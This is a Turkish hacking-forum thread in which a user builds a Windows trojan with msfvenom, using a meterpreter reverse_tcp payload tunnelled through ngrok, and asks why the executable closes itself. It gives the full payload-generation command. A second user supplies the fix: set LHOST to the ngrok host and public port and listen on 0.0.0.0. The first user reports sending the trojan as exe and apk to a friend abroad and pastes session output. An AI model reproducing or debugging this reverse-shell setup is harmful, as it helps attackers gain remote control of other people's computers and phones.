ngrok ile oluşturduğum trojan

MemoryTiger · 15 Nis 2022

dostlarım hepinize tek bir sorum olucak metasplotiti biliyorsunuzdur.
Terminala Kodumu Yazıyorum = msfvenom -p windows/meterpreter/reverse_tcp LHOST= (ngrokun verdiği ip) LPORT= (ngrok port) -f exe > /root/Masaüstü/deneme.exe

-Bu oluşturduğum trojanı ana makineme atıp denediğimde görev yöneticisini açıp bakıyorum hemen açtığım gibi kendi kendine kapanıyor.
-oradaki lhost yerine sanal makinenin hostunu yazdığımda portuda kendi portumu yazdığımda ve attığımda kapanma vs. olmuyor

buradaki sorun sanırım ngrokda ama ngrokdada olamaz ngrok gibi pktriot adlı programıda kullandım ondada kapandı

windows/meterpreter/reverse_tcp

bu kısmı şöyle yaparsam

windows/meterpreter_reverse_tcp

ana makineye attığım trojan kendini kapatmıyor negrok portun bilgisini alıyor ancak dinleme yaptığımda herhangi birşey gelmiyor

-sence bu kapanma sorununu nasıl düzeltebiliriz.
-burada yazdığım şeylermi hatalı diye düşünüyorum
-yani negrok portu dinliyor ama ana makinede exe dosyasını açtığımda exe dosyası kendini kapatıyor. yani tıklanma bilgisini gönderemiyor açık kalsa göndericek
( diyeceksiniz güvenlik duvarımı engel oluyor hepsini kapattım )

-ngrok pktriot gibi kullandıklarımda hep kendini kapattı ancak duck dns kullandığımda kapanma olmadı ancak duck dns de dinleme yaptığımda veri gelmedi

st4inl3s5 · 15 Nis 2022

lhost = 0.tcp.ngrok.io yazman gerekiyor.lporta ise public portunu yazman lazım senin açtığın port numarası değil.Public ip ngrokta tcp://0.tcp.ngrok.io adresinin : işaretinden sonraki sayı (bunları msfvenom için yaz) bağlantıyı dinlemek için de linux makinende 0.0.0.0 ipsini ve açtığın portu dinlemen lazım

MemoryTiger · 15 Nis 2022

-dinleme yapıcam ancak oluşturduğum trojan kendini kapatıyor ve dinleme yapamıyorum
-0.0.0.0 dinlediğimde ilk defa algıladı meterpreter bölümü açıldı
-çok teşekkür ederim meyersem dinlemeyi yalnış yazıyormuşum ne alaka anlamadım ama sanal makinenin inet ipsini yazıyordum (bunun cevabını merak ettim)
-herneyse gene bir sorun var oluşturduğum trojan çalıştığı gibi görev yönetcisinden gidiyor onun sebebi nedir.
-ngroksuz portsuz local hostlu yaptığımda hep orada kalıyordu kendini kapatmıyordu.
-hacaba kendinimi gizliyor. anlamadım ?

MemoryTiger · 15 Nis 2022

trojanı arkadaşıma attığımda virüs kendini kapatıyor yani dinleme yapamıyor.
güvenlik duvarı ve antivirüsleri kapattı.
ama tıkladığının bilgisi geliyor yani başarılı ancak kendini kapadığı için dinleme yapılmıyor.
hem telefonunda apk formatında açtı hemde bilgisayarında exe formatında açtı. bilgisayarındaki tıklamanın bilgisi geldi. Ancak tekrar tıkladığında bilgi gelmiyor.
telefonunda tıkladığının bilgisi geldi. ancak kendini kapattığı için dinleme yapamadı.
- Arkadaşım Hollanda'da -
[*] Sending stage (175174 bytes) to 127.0.0.1
[-] Meterpreter session 4 is not valid and will be closed

ngrok ile oluşturduğum trojan

MemoryTiger

Katılımcı Üye

st4inl3s5

Üye

MemoryTiger

Katılımcı Üye

MemoryTiger

Katılımcı Üye

Sosyal medya sayfalarımız